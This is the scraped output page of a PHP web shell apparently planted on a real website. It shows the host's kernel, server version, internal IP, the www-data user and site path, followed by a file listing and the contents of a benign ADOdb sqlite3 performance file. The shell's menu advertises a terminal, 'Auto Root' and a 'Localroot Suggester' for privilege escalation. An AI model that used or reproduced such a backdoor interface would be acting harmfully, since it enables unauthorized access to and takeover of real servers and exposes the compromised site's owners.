Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
cesa.co.za /
ADOdb /
perf /
Delete
Unzip
Name
Size
Permission
Date
Action
perf-db2.inc.php
3.4
KB
-rw-r--r--
2023-01-22 09:53
perf-informix.inc.php
2.35
KB
-rw-r--r--
2023-01-22 09:53
perf-mssql.inc.php
5
KB
-rw-r--r--
2023-01-22 09:53
perf-mssqlnative.inc.php
5.01
KB
-rw-r--r--
2023-01-22 09:53
perf-mysql.inc.php
8.6
KB
-rw-r--r--
2023-01-22 09:53
perf-oci8.inc.php
24.01
KB
-rw-r--r--
2023-01-22 09:53
perf-postgres.inc.php
5.52
KB
-rw-r--r--
2023-01-22 09:53
perf-sqlite3.inc.php
721
B
-rw-r--r--
2023-01-22 09:53
Save
Rename
<?php // security - hide paths if (!defined('ADODB_DIR')) die(); class perf_sqlite3 extends adodb_perf{ var $tablesSQL = "SELECT * FROM sqlite_master WHERE type='table'"; var $createTableSQL = "CREATE TABLE adodb_logsql ( created datetime NOT NULL, sql0 varchar(250) NOT NULL, sql1 text NOT NULL, params text NOT NULL, tracer text NOT NULL, timer decimal(16,6) NOT NULL )"; var $settings = array(); function __construct(&$conn) { $this->conn = $conn; } function tables($orderby='1') { if (!$this->tablesSQL){ return false; } $rs = $this->conn->execute($this->tablesSQL); if (!$rs) { return false; } $html = rs2html($rs, false, false, false, false); return $html; } }